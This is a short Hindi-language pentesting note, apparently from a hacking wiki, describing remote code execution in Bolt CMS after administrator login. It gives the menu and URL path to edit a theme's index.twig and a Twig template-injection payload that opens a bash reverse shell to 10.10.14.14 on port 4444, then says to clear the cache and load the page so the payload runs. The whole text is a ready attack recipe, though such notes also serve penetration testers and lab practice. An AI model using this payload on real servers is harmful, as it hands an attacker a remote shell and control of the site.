Bolt CMS
RCE
व्यवस्थापक के रूप में लॉगिन करने के बाद (/bot पर जाने लॉगिन प्रॉम्प्ट तक पहुंचने के लिए), आप बोल्ट सीएमएस में RCE प्राप्त कर सकते हैं:
Configuration
->View Configuration
->Main Configuration
का चयन करें या URL पथ/bolt/file-edit/config?file=/bolt/config.yaml
पर जाएंथीम का मान जांचें
File management
->View & edit templates
का चयन करेंपिछले (इस मामले में
base-2021
) स्टेप में पाए गए थीम बेस का चयन करें औरindex.twig
का चयन करेंमेरे मामले में यह URL पथ /bolt/file-edit/themes?file=/base-2021/index.twig में है
इस फ़ाइल में अपना पेलोड सेट करें टेम्पलेट इंजेक्शन (Twig) के माध्यम से, जैसे:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
और परिवर्तन सहेजें
Maintenance
->Clear the cache
में कैश को साफ करेंफिर से एक सामान्य उपयोगकर्ता के रूप में पृष्ठ तक पहुंचें, और पेलोड का निष्पादन होना चाहिए
Last updated